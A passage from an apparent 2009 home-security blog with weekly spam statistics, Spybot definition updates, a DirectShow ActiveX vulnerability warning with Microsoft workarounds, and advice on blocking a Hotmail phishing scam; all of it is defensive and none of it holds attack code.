HGH Scams:	3.85%

The latest weekly additions to my custom MailWasher Pro filters was the deletion of the Geocities filter, which has been replaced with the Yahoo Groups spam link filter. Yahoo has done away with Geocities, which were free websites, mostly used by spammers, hobbists and newbies to websites. A lot of this week's spam contained links to Yahoo groups and fit a predictable pattern, so I created a filter to match and delete it.

MailWasher Pro intercepts POP3 and IMAP email before you download it to your desktop email client (e.g: Microsoft Outlook, Outlook Express, Windows Live Mail) and scans it for threats or spam content, then either manually or automatically deletes any messages matching your pre-determined criteria and custom filters. It is my primary line of defense against incoming spam, scams, phishing and exploit attacks. If you are not already using this fine anti-spam tool I invite to to read about it on my MailWasher Pro web page. You can download the latest version and try it for free for a month. Registration is only required once, for the life of the program.

To protect your computer from web pages rigged with exploit codes, malware in email attachments, dangerous links to hostile web pages, JavaScript redirects, Phishing scams, or router DNS attack codes, I recommend Trend Micro Internet Security. It has strong realtime monitoring modules that stop rootkits and spam Trojans from installing themselves into your operating system. Also known as PC-cillin, it is very frequently updated as new and altered malware definitions become available and it checks for web based threats and new malware definitions by searching secure online servers owned by Trend Micro. This is referred to as "in-the-cloud" security.

All of the spam and scams targeting my accounts were either automatically deleted by my custom MailWasher Pro spam filters, or if they made it through, was reported to SpamCop, of which I am a reporting member, and manually deleted. MailWasher Pro is able to forward messages marked as spam to SpamCop, which then sends a confirmation email to you, containing a link. You must click on the enclosed reporting link and open it in your browser, then manually submit your report. This is how SpamCop wants it done.

Posted by Wiz at 12:00 AM | Permalink

back to top ^

There is a new vulnerability in a Microsoft ActiveX (DirectShow) control that is currently being exploited in the Wild, to take over or infect vulnerable machines. Also, the related MPEG2TuneRequest ActiveX Control Object is being exploited.

Microsoft Security Advisory (972890), published on July 06, 2009, describes the vulnerability as affecting users of various versions of Internet Explorer (web browsers), in such a way that code execution occurs from remote locations and may not require any user intervention at all. This is typical of "drive-by" ActiveX exploits. As a result, an attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Since most Windows XP users operate with full Administrator privileges, their machines could be taken over completely and without notice.

This newly-exploited vulnerability is the second unpatched DirectShow bug to surface in the last five weeks. Workarounds for the new DirectShow vulnerability are listed in my extended content.

This security advisory is like the horse that is out of the stable. This vulnerability that was only acknowledged on Monday, July 6 has already been distributed over the past weekend via compromised websites with injected redirection codes.The compromised sites lead to a handful of payload sites hosting the exploit code which targets msvidctl.dll - an ActiveX control for streaming video. I have read several reports ^{1 2 3} about a recent flurry of website injection compromises that started by targeting mostly Chinese servers, but has since moved to attack any server anywhere that responds to the code injection attempt.

Each compromised website acts as a zombie redirector in a botnet of websites. The payloads are hosted on Asian and Former Soviet Union servers, where take-downs of malicious sites are slow at best, and non-existent in many instances. The injected script re-routes visitors of those websites to a malicious exploit-laden site, which in turn downloads and launches a multi-exploit hacker toolkit that includes the DirectShow attack code and the KillAV malware (which tries to kill your anti virus program). DirectShow is a part of Windows' DirectX graphics infrastructure. Windows XP and Server 2003 computers appear to be the only ones directly vulnerable to this DirectShow ActiveX attack. However, Vista users who operate as Administrators, with UAC turned off are also at high risk.

How you can protect your computer against the DirectShow exploits

Until Microsoft releases a patch, tentatively set for July 14, 2009, users of XP and Server 2003 can apply the Workarounds outlined in the Microsoft Security Advisory and disable the vulnerable ActiveX controls

Microsoft Security Advisory (972890) explains how to disable the 45 ActiveX controls provided by msvidctl.dll to mitigate this vulnerability. The Microsoft Technet blog article about this vulnerability has a button to fix the kill bits for these ActiveX Objects with one push (requires Internet Explorer). Or, better yet, alter your Internet Options to disable all ActiveX Controls in the Internet Zone, whether signed or unsigned, or marked safe or otherwise.

UPDATE - 7/10/2009
Microsoft has added Fix It and Undo workaround buttons on this security advisory support page. These offer one push solutions to set or unset the killbits for all 45 affected ClassIDs of the vulnerable ActiveX Controls. The instructions state: "To implement the workaround that disables the Microsoft Video ActiveX Control automatically on a computer that is running Windows XP or Windows Server 2003, click the Fix this problem link under Enable workaround. To undo the workaround, click the Fix this problem link under Disable workaround. Then click Run in the File Download dialog box, and follow the steps in this wizard."

Whether you choose to run the Fix It buttons on a browser, or download the fix it file (has a .msi extension, thus cannot be right-click "run as" an administrator), you will need to run them from an account that has Administrator privileges (unfortunately). XP users operating as Limited or Power Users will need to close Internet Explorer, fast-switch into an Administrator level account, run the fix (file or browser) tool, log out of the Admin account, then log back into your reduced privileges (safer) account. When you re-open Internet Explorer the killbits for the affected ActiveX controls will be set. You survive to surf another day! You're welcome!

I also recommend that you further protect your computers by downloading Mozilla's Firefox browser and surfing the web with it, exclusively (Firefox offers to import IE cookies and Favorites during setup). Firefox doesn't recognize or run any ActiveX controls, making it safer out of the box. Also, any critical bugs in Firefox are usually patched very quickly, to protect the users from exploits via their Firefox browsers. Always use the latest version of Firefox and set the checking for updates to automatic.

In addition to affecting Internet Explorer browsers, the DirectShow exploits also target Microsoft Outlook, Outlook Express and Windows Live email clients. If you have moved your email client out of the Restricted Sites Zone, and allow HTML content to be displayed, you are at risk from email-born exploit attacks. Even with your email client opening messages in the Restricted zone, the links in those messages will still be clickable. If you are fooled into clicking on a hostile link, chances are high that your PC will become Botnetted, or acquire a Trojan, or a downloader malware agent. The same applies to links sent to you by Bots, in hijacked Instant Messages.

This bears repeating: An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. I invite you to read my article explaining how operating with reduced user privileges protects against the installation of 92% of known malware.

The US-CERT has published a great article explaining how to secure your web browsers against most common exploit tactics. You should bookmark that page!

In closing, apply the workarounds listed in Microsoft Advisory 972890 to kill the affected ActiveX Controls (or turn OFF ActiveX altogether). Surf the interwebs with Firefox, not Internet Exploder. Finally, keep the best anti malware protection on your computer that you can afford. I use and recommend Trend Micro Internet Security 2009. If you can't afford to purchase a commercial security suite, at least get a decent free anti virus and anti-spyware/malware solution. Avira AntiVir Free and Spybot Search & Destroy are good free programs. So is MalwareBytes AntiMalware, which I use and promote.

Posted by Wiz at 6:16 PM | Permalink

back to top ^

If you use Spybot Search and Destroy to protect your computer against spyware and malware, it is time again to run your manual updates. Malware writers are constantly modifying their programs to evade detection, so anti-malware vendors have to issue regular updates to keep up with the bad guys. New definitions and false positive fixes for Spybot Search and Destroy are usually released every Wednesday. This week's updates were released on schedule on July 8, 2009, as listed below. Some new and altered fake security programs were added to the detections, plus several new Trojans, rootkits and modified spam bots.

Updating Spybot Search and Destroy

Before you update Spybot Search and Destroy make sure you have the latest official version. Older versions are no longer supported and will cause you a lot of grief when you immunize and scan for problems. Only download Spybot S&D from the official website, at: spybot.info, or from its alternate domain: Safer-Networking.org. Fake versions with similar names will rip you off for payment to remove threats, whereas the real Spybot S&D is free (donations gladly accepted).

In case you are new to Spybot S&D, there are two ways to update the program and malware definitions. The preferred method (For Windows PCs) is to go to Start > (All) Programs > Spybot - Search & Destroy > Update Spybot - S&D. The independent update box will open. Leave the default options as is, unless you need all languages or want beta definitions, and click on "Search." Another box will open with "mirror" locations around the world where you can download updates. Select a location nearest to you from the list and click on "Continue." Make sure all updates are checked, then click on "Download." If all definitions are verified as being correct the check marks will disappear from the check boxes and be replaced with green arrow graphics. However, sometimes one or more mirror locations have not updated all of the definitions and you will get a red X for those definitions. Click on Go Back, select a different mirror, and try again. I have consistent success using Giganet or the Safer-Networking servers. When all updates have succeeded, click on "Exit."

Download links and more instructions about using Spybot Search and Destroy are in my article titled "How to use Spybot Search & Destroy to fight malware".

The description of the latest definition updates and false positive fixes are in my extended comments below.

Additions to malware definitions made on July 8, 2009:

Hijackers
+ CnsMin

Keyloggers
+ Win32.GhostKeyLogger.c

Malware (Includes rogue or fraudulent security programs, fake registry cleaners, and fake security alerts, plus other nasty programs)
+ Fraud.MalwareDefender2009
+ Fraud.Sysguard
+ Fraud.SystemGuard2009
+ Fraud.XPDeluxeProtector
+ Mirar
+ Smitfraud-C.
+ Win32.Agent.ieu
+ Win32.Agent.oyo
+ Win32.FraudLoad
+ Win32.Virut.mtt

PUPS (Possibly UnPopular Software or Potentially Unwanted Program)
+ MyWay.MyWebSearch (Most prevalent malware detection last week)

Spyware
+ Marketscore.RelevantKnowledge

Trojans (Trojans come to you disguised as something useful, or as a missing codec required to view a spammed video, but, like the Trojan Horse of antiquity, they hold dangerous contents that cause great harm! Many of these Trojans are Botnet infections, backdoors, malicious download agents and Rootkits.)
+ Hupigon
+ Win32.Adload.jm
+ Win32.Agent.amwr
+ Win32.Agent.as
+ Win32.Agent.gpr
+ Win32.Agent.kds
+ Win32.Agent.MSO
+ Win32.Ertfor
+ Win32.Knock.it
+ Win32.Koobface
+ Win32.TDSS.clt
+ Win32.TDSS.gen
+ Win32.TDSS.reg
+ Win32.TDSS.rtk
+ Win32.VB.iin
+ Win32.ZBot

Total: 1446905 fingerprints in 493864 rules for 4747 products.

False positive detections reported, discussed, or fixed this week:

There is a confirmed False Positive detection of "Win32.SharaQQ.30" in a file named "SVKP.sys" - which was distributed in some older versions of TweakXP. If you have TweakXP installed and Spybot moved that file, uninstall it, then download and install the newest version of TweakXP.

The changes to the Spybot detection database did not make it for the update today so they will be released with the next update scheduled for Wednesday 2009-07-15. Until then you can mark the detection on the svkp.sys and the service belonging to it to be ignored from further searches.

There was a confirmed False Positive detection of "Win32.TDSS.reg" on a computer equipped with a SkyNet HDTV Tuner card. Another user who doesn't have that tuner reported the same detection, but it is indeed malware. If you have the Skynet HDTV tuner it is probably a FP and was fixed with last week's updates.

Another false positive caused programs like Web CEO to break. That FP was fixed with the July 1 updates.

After you update definitions to fix false positives a restart of either TeaTimer or the Computer is required. If this doesn't fix the false positives, you may need to reset the TeaTimer detection list, as follows:

Right click the (TeaTimer) Resident tray icon
Select "Reset lists"

If that fails also, please read the rest of the things to try on this forum page, in replies #2 and #4.

When TeaTimer blocks the file you can also allow the file to be executed (also remove the check mark for deletion). You can exclude any file from further detections during a scan by right clicking the items in the Spybot S&D scan result and select "exclude this detection from further searches"

If you keep getting false positive detections and broken programs, due to TeaTimer issues, try disabling that module. You can toggle TeaTimer off and on by switching into Advanced Mode > Tools > Resident.

False Positives are reported and discussed in the Spybot S&D False Positives Forum.

As mentioned earlier, links and more instructions about using the program, or reporting suspected false positives, are found in my article titled How to use Spybot Search & Destroy to fight malware.

Posted by Wiz at 5:25 PM | Permalink

back to top ^

This is the latest entry in my weekly series about classifications of spam, according to my custom filter rules used by MailWasher Pro. The categories are shown on the "Statistics" page > "Junk Mail," as a pie chart, based on my custom filters and blacklist. The amount of email flagged as spam is shown on the "Summary" page of Statistics.

The volume of spam coming to my various honeypots and user accounts has increased slightly again this week. This indicates to me that some of the Botnets that lost their Control and Command servers following the forced shutdown of colocation host Pricewert have found other server hosts that allow illegal activities. Thus, sleeping zombie bots are awakening and spamming again.

The classifications of spam in my analysis can help you adjust your email filters according to what is most common, on a weekly basis. Most of the spam this week was for various fake pharmacies, which sell illicit and counterfeit pharmaceuticals like Viagra, weight loss scams and phishing scams.

See my extended comments for this week's breakdown of spam by category, for June 29 - July 5, 2009 and the latest additions to my custom MailWasher Pro filters

MailWasher Pro spam category breakdown for June 29 - July 5, 2009. Spam amounted to 19% of my incoming email this week. This represents a 6% increase from last week.

Known Spam Domains:	31.58%
Male Enhancement Patches, etc:	18.42%
"Other filters": (See my MWP Filters page)	15.79%
Phishing Scams (bank or credit card):	5.26%
Counterfeit Watches:	5.26%
Blacklisted Domains/Senders (e.g: kef+diz@+):	5.26%
Diploma Scams:	5.26%
Weight Loss Scams (e.g. Acai Berry)	2.63%
Canadian Pharmacy spam:	2.63%
Counterfeit Software:	2.63%
Hidden ISO or ASCII Subject:	2.63%
Subject All Capital Letters:	2.63%

The latest weekly additions to my custom MailWasher Pro filters include updates to the Male Enhancement [S] spam filter. Most of the known spam domains, Known Spam Subjects and Known Spam From/Body emails lead to bogus male enhancement solutions, like the fake Canadian Pharmacy sites, now hosted on Chinese domains and servers. This continues to be the major theme of spam for several years now. There must be a lot of suckers out there, still falling for these fake Chinese male enhancement scams.

MailWasher Pro intercepts POP3 and IMAP email before you download it to your desktop email client (e.g: Microsoft Outlook, Outlook Express, Windows Live Mail) and scans it for threats or spam content, then either manually or automatically deletes any messages matching your pre-determined criteria and custom filters. It is my primary line of defense against incoming spam, scams, phishing and exploit attacks. If you are not already using this fine anti-spam tool I invite to to read about it on my MailWasher Pro web page. You can download the latest version and try it for free for a month. Registration is only required once, for the life of the program.

To protect your computer from web pages rigged with exploit codes, malware in email attachments, dangerous links to hostile web pages, JavaScript redirects, Phishing scams, or router DNS attack codes, I recommend Trend Micro Internet Security. It has strong realtime monitoring modules that stop rootkits and spam Trojans from installing themselves into your operating system. Also known as PC-cillin, it is very frequently updated as new and altered malware definitions become available and it checks for web based threats and new malware definitions by searching secure online servers owned by Trend Micro. This is referred to as "in-the-cloud" security.

All of the spam and scams targeting my accounts were either automatically deleted by my custom MailWasher Pro spam filters, or if they made it through, was reported to SpamCop, of which I am a reporting member, and manually deleted. MailWasher Pro is able to forward messages marked as spam to SpamCop, which then sends a confirmation email to you, containing a link. You must click on the enclosed reporting link and open it in your browser, then manually submit your report. This is how SpamCop wants it done.

Posted by Wiz at 2:24 PM | Permalink

back to top ^

Today I received an unusual phishing scam that I traced to Lagos, Nigeria. It is disguised as an urgent message from the Windows Live Team, to all Hotmail subscribers. The subject was: "LAST WARNING (ACCOUNT ALERT)" - in all capital letters - as is typical of Nigerian 419 scammers. The email claims that Hotmail is overloaded with free user accounts and must prune unused accounts to free up resources. What a bunch of hooey! Anyway, the intended victim is asked for his or her Hotmail address and password (Microsoft already knows this), date of birth (why would Microsoft need that?) and your location. The details are supposed to be filled out in the enclosed form and submitted to the scammers.

This is a phishing scam looking to steal active Hotmail accounts for use as spam sending zombies, using Hotmail's good reputation to avoid email sender blockades. The phished date of birth information can be crosschecked against other stolen or looked up details about you, or they can read your personal details saved in your Hotmail account profile, to perform identity theft. This information would then be sold to more advanced cyber criminals.

The scam email I received today was sent from the IP address 62.173.55.107 which is part of the CIDR 62.173.32.0/19, which covers all IPs between 62.173.32.0 and 62.173.63.255. This CIDR is registered to ipNX Nigeria Limited, in Lagos, NG.

I discuss methods of preventing these Nigerian scam emails from reaching your desktop email clients, or forum members, in my extended comments.

How to block Nigerian 419 scammers

If you run a web server and have administrator (root) privileges, you can block all email coming from known Nigerian and other African IP addresses by applying my Nigerian Iptables Blocklist to the mail server (mail blockade), or Linux APF Firewall rules (total blockade). By applying the Nigerian Iptables Blocklist to your Linux/Apache Server firewall you will block all access to all websites hosted on it. This includes databases, email, ftp and http services. It will appear as though there is no server, or websites, at the URL they request or send mail to.

If you don't have root access to the Linux OS you can still block Nigerian 419 scammers from accessing your web pages and forums via HTTP, by applying my .htaccess Nigerian Blocklist to your public web root directory .htaccess file. This requires that your website be hosted on the common Apache Web Server, running on a Linux or Unix OS.

I provide other IP blocklists in both iptables and .htaccess formats. If you lease a dedicated server your server administrator can install the iptables blocklist rules for you. I am available for hire to install .htaccess blocklists, or to customize a blocklist for your individual websites, as long as they are hosted on Apache web servers. Use my Webmaster contact page to request a quote or to arrange for ongoing website security maintenance.

Most commercial web hosting companies offer an mail server for incoming (POP3) and outgoing (SMTP) email for their hosting customers. Most of these mail servers have the free option of turning on an email spam filter of one kind or another. Most spam filters recognize subjects with all capital letters and will flag those messages as "{SPAM}." You can then have your email client* filter messages marked as SPAM to be deleted, or sent to a folder you create for questionable messages.

If you do not have your own web server for receiving your POP3 email, but still use a desktop email client (e.g. Microsoft Outlook, Outlook Express, Windows Live Mail, etc), you still have an option available to block this Nigerian crap email. I use and recommend a spam filtering email screening program called MailWasher Pro. MailWasher Pro sits on your Windows Desktop as an application between your POP3 email servers and your desktop email client. It receives email at an interval you select and screens it to identify spam and either flag it or automatically delete it. I set my Windows Live Mail client to manually download messages only when I press the Send/Receive button, which I do to download desirable messages that have been cleared by MailWasher Pro. I report any spam or scam messages that make it through my automatic deletion filters to SpamCop, through MailWasher Pro itself.

MailWasher Pro uses a combination of learning filters, a blacklist, a friends list, known spam blocklists (like SpamCop) and custom user written filters, to identify and deal with spam. I happen to write custom filters for use with the program and which can identify and either manually or automatically delete about 95% of all incoming spam and scam messages. You can learn about, or download Wizcrafts' Custom MailWasher Filters here. There are 3 sets available, the details of which are explained on the aforementioned web page. My "Subject All Caps" filter flagged the scam message that started this article.

MailWasher Pro is a commercial program that you pay for once and receive free program updates for life. I've been using it for about 8 years now and have only paid once. The current version, as of July 2, 2009, is 6.51. It is fully compatible with all versions of Windows, including the soon to be released Windows 7. The current price is $39.95, for a lifetime registration.

If you use a web browser to obtain your email you are at the mercy of your email service provider to supply their users with spam protection. Check your email options to see what level of Spam blocking is available to you and apply it. You may have to white list your friends and contacts to avoid having some of their messages accidentally deleted as Spam, but it is worth the effort.

If you are one of the intended targets of this phishing scam, a Hotmail user, login to your Hotmail account (in your browser), click on: Options (upper right area), then Junk Mail > Filters and Reporting > Choose a junk e-mail filter. Select either Low, Standard, or Exclusive and Save your choice. Next, choose when to delete junk e-mail. Last, choose whether to report junk mail to Hotmail, to help finetune their spam filters. Note, that your Hotmail login can also be your Windows Live ID, should you need one.

Always be suspicious of any email that tries to panic you into taking an action that is against common sense. Phishing scams are designed to cause panic and make victims respond before they have a chance to think about the claims made in that email scam. This is the same tactic used by high-pressure salesmen and telephone solicitors and scamsters. Always check with the website in question to see if they really did send such an email to their users. Always type the URL manually, or use a link saved in your bookmarks, from a previous successful login. Watch for HTTPS at the beginning of any URL leading to a bank or other secure login location (like Hotmail).

Posted by Wiz at 5:13 PM | Permalink

back to top ^

If you use Spybot Search and Destroy to protect your computer against spyware and malware, it is time again to run your manual updates. Malware writers are constantly modifying their programs to evade detection, so anti-malware vendors have to issue regular updates to keep up with the bad guys. New definitions and false positive fixes for Spybot Search and Destroy are usually released every Wednesday. This week's updates were released on schedule on July 1, 2009, as listed below. Some new and altered fake security programs were added to the detections, plus several new Trojans, rootkits and modified spam bots.

Updating Spybot Search and Destroy

Before you update Spybot Search and Destroy make sure you have the latest official version. Older versions are no longer supported and will cause you a lot of grief when you immunize and scan for problems. Only download Spybot S&D from the official website, at: spybot.info, or from its alternate domain: Safer-Networking.org. Fake versions with similar names will rip you off for payment to remove threats, whereas the real Spybot S&D is free (donations gladly accepted).

In case you are new to Spybot S&D, there are two ways to update the program and malware definitions. The preferred method (For Windows PCs) is to go to Start > (All) Programs > Spybot - Search & Destroy > Update Spybot - S&D. The independent update box will open. Leave the default options as is, unless you need all languages or want beta definitions, and click on "Search." Another box will open with "mirror" locations around the world where you can download updates. Select a location nearest to you from the list and click on "Continue." Make sure all updates are checked, then click on "Download." If all definitions are verified as being correct the check marks will disappear from the check boxes and be replaced with green arrow graphics. However, sometimes one or more mirror locations have not updated all of the definitions and you will get a red X for those definitions. Click on Go Back, select a different mirror, and try again. I have consistent success using Giganet or the Safer-Networking servers. When all updates have succeeded, click on "Exit."

Download links and more instructions about using Spybot Search and Destroy are in my article titled "How to use Spybot Search & Destroy to fight malware".

The description of the latest definition updates and false positive fixes are in my extended comments below.

Additions to malware definitions made on July 1, 2009:

Keyloggers
+ SCKeylogger

Malware (Includes rogue or fake anti-virus and anti-spyware programs and fake registry cleaners and fake security alerts, plus other nasty programs)
+ Mirar
+ Win32.FraudLoad.edt
++ Win32.Perlovga.a

PUPS (Possibly UnPopular Software or Potentially Unwanted Program)
+ GameVance
+ OriginalSolitaire

Trojans (Trojans come to you disguised as something useful, or as a missing codec required to view a spammed video, but, like the Trojan Horse of antiquity, they hold dangerous contents that cause great harm! Many of these Trojans are Botnet infections, backdoors and Rootkits.)
+ Win32.Agent.ext
+ Win32.Agent.fbx
++ Win32.AutoRun.wqh
++ Win32.Buzus.aspx
++ Win32.Dontovo
+ Win32.FraudLoad.pd
+ Win32.Seneka.rtk
+ Win32.TDSS.clt
+ Win32.TDSS.dt
++ Win32.TDSS.reg
+ Win32.TDSS.rtk
+ Win32.ZBot

Total: 1436805 fingerprints in 491598 rules for 4715 products.

False positive detections reported or fixed this week:

Two confirmed false positives were reported and fixed since last week. They are as follows...

A confirmed false positive detection of "Win32.Agent.Bbzv" in the file: C:\Program Files\erunt\autoback.exe, has been fixed with the July 1 updates.

A confirmed false positive detection of "Win32.Agent.Bbzv" in both WordWeb Free and Pro (Wweb32.exe) versions was fixed today.

After you update definitions to fix false positives a restart of either TeaTimer or the Computer is required.

When TeaTimer blocks the file you can also allow the file to be executed (also remove the check mark for deletion). You can exclude any file from further detections during a scan by right clicking the items in the Spybot S&D scan result and select "exclude this detection from further searches"

False Positives are reported and discussed in the Spybot S&D False Positives Forum.

As mentioned earlier, links and more instructions about using the program, or reporting suspected false positives, are found in my article titled How to use Spybot Search & Destroy to fight malware.

Posted by Wiz at 9:36 PM | Permalink

back to top ^